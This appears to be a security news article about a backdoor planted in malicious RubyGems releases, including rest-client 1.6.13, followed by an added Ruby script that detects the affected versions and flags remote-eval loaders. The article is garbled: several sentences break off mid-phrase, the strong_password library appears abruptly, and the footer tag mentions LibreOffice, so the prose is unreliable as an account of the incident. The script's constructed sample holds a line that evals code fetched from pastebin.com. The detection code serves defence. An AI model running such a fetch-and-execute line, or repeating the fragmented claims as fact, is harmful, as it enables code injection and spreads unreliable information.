Maintainers of the RubyGems package repository have discovered a backdoor mechanism in 18 malicious versions of 11 Ruby libraries.
One of the most popular Ruby libraries, the rest-client, was found containing the malicious code yesterday.
The malicious code was included in four versions of rest-client.
“It seems that rest-client 1.6.13 is uploaded to rubygems.org. I did review between 1.6.9 and 1.6.13 and it seems that the latest version evaluates remote code from pastebin.com and sends information to mironanoru[.]zzz.com [.
The Ruby developer Jan Dintel, who analyzed the code, discovered it would collect and send the environment variables of a compromised system (i.e. credentials of services used by the compromised system such as use
“Depending on your
The backdoor mechanism could be triggered by the attacker by sending a signed cookie; the code would then send the captured credentials back to the attackers. The backdoor
The attacker is believed to have been active for more than a month without being detected, until the account of rest-client developer Matthew Manning was compromised and used to push four malicious versions of rest-client to RubyGems.
In total, 18 malicious versions of the libraries were published, and they were downloaded 3,584 times before being removed from RubyGems.
Projects that rely on the
In production, the code would download a payload from Pastebin.com and execute it to create the actual backdoor in the application that used the strong_password library.
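As an added example (not code from the article or from the rest-client project), the Ruby checks below are what a defender could run in CI against the backdoor described above: one flags locked gem versions known to carry it, the other flags source lines that hand content fetched from pastebin.com to eval. Only rest-client 1.6.13 is taken from the article; the rest of the KNOWN_BAD list is a placeholder, and the sample Gemfile.lock and source line are constructed.

```ruby
# Added example, not code from the article or the rest-client project: two
# defensive checks for the backdoor described above. (1) flag locked gem
# versions known to carry it; (2) flag source that evals code from pastebin.com.

# rest-client 1.6.13 is the version named in the article; the other three
# malicious releases are a PLACEHOLDER to be filled in from the advisory.
KNOWN_BAD = { "rest-client" => ["1.6.13"] }.freeze

# Parse the "specs:" block(s) of a Gemfile.lock into { name => version }.
# Locked gems sit at four-space indent; their deeper-indented deps are skipped.
def parse_lock_versions(lock_text)
  versions = {}
  in_specs = false
  lock_text.each_line do |line|
    in_specs = true if line.strip == "specs:"
    in_specs = false if in_specs && line.strip.empty?   # blank line ends block
    next unless in_specs
    m = line.match(/\A {4}(\S+) \(([^)]+)\)/)
    versions[m[1]] = m[2] if m
  end
  versions
end

# Return [name, version] pairs that match a known-bad release.
def find_bad_gems(lock_text)
  parse_lock_versions(lock_text)
    .select { |name, ver| KNOWN_BAD.fetch(name, []).include?(ver) }
    .to_a
end

# Heuristic: a source line that both names pastebin.com and hands fetched
# content to eval. Returns [line_number, stripped_line] pairs.
def remote_eval_lines(source)
  source.each_line.with_index(1).select do |line, _|
    line =~ /pastebin\.com/i && line =~ /\beval\b.*\b(Net::HTTP|URI\.open|open\()/
  end.map { |line, no| [no, line.strip] }
end

# Constructed sample inputs (not real project files).
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      mime-types (3.2.2)
      rest-client (1.6.13)
        mime-types (>= 1.16, < 4.0)

  PLATFORMS
LOCK
SAMPLE_SRC = "require 'net/http'\n" \
             "eval(Net::HTTP.get(URI('https://pastebin.com/raw/CONSTRUCTED')))\n"
```

Both checks are heuristics: the version list catches only releases you already know about, and the eval pattern flags one specific loader shape, so neither replaces verifying gems against a checksum-pinned lock file.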
(SecurityAffairs – LibreOffice, hacking)